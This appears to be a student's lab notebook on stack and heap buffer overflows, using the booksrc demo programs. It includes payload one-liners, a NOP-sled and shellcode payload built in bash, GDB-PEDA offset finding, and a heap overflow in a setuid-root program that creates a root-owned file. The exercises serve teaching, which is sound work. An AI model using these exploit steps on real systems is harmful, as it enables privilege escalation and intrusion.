# Buffer Overflows
- most Internet worms use buffer overflow vulnerabilities to propagate
- C and C++ assume that programmers are responsible for data integrity
- modern compilers and OSes provide various protections making it harder to exploit traditional buffer overflows
- once the buffer is allocated, there's no built-in mechanism to safeguard the amount of data that can be stored into to
    - this is called buffer overrun or buffer overflow
    - user data may overwrite other part of the memory it's not supposed to making the program behave differently or crashing the program
    - hackers could take advantage of this flaw to control the program and may pawn the system by executing shellcode or payload of their choice
- typically two types:
    1. stack overflow
    2. heap overflow

## Stack Overflow
- overrun in stack segment

### some demo programs that demonstrate stackoverflow

### overwrite variable values with the data of your choice
1. booksrc/overflow_example.c
- compile and run the program with some arguments
    - `./overflow_example $(perl -e 'print "A"x15')`
    - `./overflow_example $(perl -e 'print "A"x16')`
- try to overwrite value of int value variable with "BCDE"
- find the difference between the address of value and buffer_two
    - perl -e 'print hex(0xbffff1dc-0xbffff1cc)' -> 22 bytes? should be 16
    - `./overflow_example $(perl -e 'print "A"x16 . "BCDE"')`
    - `./overflow_example $(perl -e 'print "Ax16 . "\x45\x44\x43\x42")`

### change the flow of the program
#### authenticate without using actual password

2. booksrc/auth_overflow.c
- overrun the buffer to print "Access Granted" without providing actual password
    - `./compile.sh auth_overflow_c auth_overflow`
    - `./auth_overflow $(perl -e 'print "A"x20')`
    
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
    - ./gdb -q auth_overflow
    - break main
    - break check_authentication
    - run $(perl -e 'print "A"x20')
    - x/s password_buffer
    - x/x &auth_flag

### can you overflow if the variable declaration orders are switched? why or why not? verify it using GDB.

#### overwrite the return address to authenticate? doesn't work on newer system (tested on Kali (4-19-0)!
3. booksrc/authoverflow2.c
- see in gdb where auth_flag is compared to password_buffer
- turns out auth_flag is still at higher address (pushed before) compared to password_buffer
- address with As

## stackoverflow exploit demo
- ./compile.sh booksrc/stackoverflowdemo.c stackoverflowdemo
- ./python2 exploit_stackoverflow.py

### How was the exploit_stackoverflow.py generated?

### Use GDB-PEDA
- create pattern and use as an agrument to the program
    - gdb -q ./stackoverflowdemo
    - pattern arg 200
    - run 
    - after program crashes run
    - patts or pattern search
    - look for EIP.and note the EIP offset
        - ..found at offset [#] that's the total offset  where return address (to end of retrun address) is from the overflown buffer base address 
- generate skeleton exploit code using GDB-PEDA
    - skeleton argv exploit_stackoverflow.py
- create local linux shellcode 
    - shellcode generate x86/linux exec
- copy the shellcode in the python exploit code
- create payload: `[NOP sled | exploit | return address]`
- find return address somewhere in the middle of buffer using GDB

## Using bash to exploit stackoverflowdemo.exe
- create payload buffer with shellcode
    - 48 bytes nop sleds + shellcode (24 bytes) + return address (4 bytes)
- run program with the payload
    - `$ ./stackoverflowdemo.exe $(cat payloadFile)`

In [9]:
%%bash
payloadFile=./booksrc/stackoverflowpayload.bin
perl -e 'print "\x90"x48' > $payloadFile
cat ./booksrc/shellcodex86linuxexec >> $payloadFile
perl -e 'print "\x34\xf1\xff\xbf"' >> $payloadFile
# check the size of the file
echo "$payloadFile Size in bytes"
wc -c $payloadFile

./booksrc/stackoverflowpayload.bin Size in bytes
76 ./booksrc/stackoverflowpayload.bin


### notesearch has stackoverflow vulnerability
- booksrc/notesearch.c

- compile.sh notesearch.c notesearch.exe
- `./notesearch.exe $(perl -e 'print '"A"x60')`

### exploit_notesearch.c is a complete exploit program that exploits stackoverflow in notesearch
- ./compile.sh exploit_notesearch.c exploit_notesearch.exe
- ./exploit_notesearch.exe
- run the provided exploit_notesearch.sh script to determine the offset
    - change the range if you still do not get the shell

## Heap Overflow
- buffer overflow can happen in other segments such as **heap** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
- not standarized as stack overflow but can be just as effective

### notetaker.c is susceptible to heap overflow
```strcpy(buffer, argv[1]); // problem!
```

In [ ]:
%%bash
./booksrc/compile.sh ./booksrc/notetaker.c ./booksrc/notetaker.exe

### notetaker.exe must be setuid root program 
- all users in the system can take their own notes by writing to /var/notes file

```
$ sudo chown root:root notetaker.exe
$ sudo chmod u+s notetaker.exe
```

In [6]:
%%bash
ls -al ./booksrc/notetaker.exe

-rwsr-xr-x 1 root root 19156 Apr 17 16:24 ./booksrc/notetaker.exe


In [7]:
%%bash
./booksrc/notetaker.exe "new notefor user"

[DEBUG] buffer   @ 0x804d160: 'new notefor user'
[DEBUG] datafile @ 0x804d1d0: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.


In [8]:
%%bash
./booksrc/notetaker.exe $(perl -e 'print "A"x112')

[DEBUG] buffer   @ 0x804d160: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] datafile @ 0x804d1d0: ''


[!!] Fatal Error in main() while opening file: No such file or directory


CalledProcessError: Command 'b'./booksrc/notetaker.exe $(perl -e \'print "A"x112\')\n'' returned non-zero exit status 255.

In [9]:
%%bash
./booksrc/notetaker.exe $(perl -e 'print "A"x112 . "testfile"')

double free or corruption (out)
bash: line 1: 10429 Aborted                 ./booksrc/notetaker.exe $(perl -e 'print "A"x112 . "testfile"')


CalledProcessError: Command 'b'./booksrc/notetaker.exe $(perl -e \'print "A"x112 . "testfile"\')\n'' returned non-zero exit status 134.

In [10]:
%%bash
ls -al testfile

-rw------- 1 root user 126 Apr 17 16:39 testfile


In [11]:
%%bash
cat testfile

cat: testfile: Permission denied
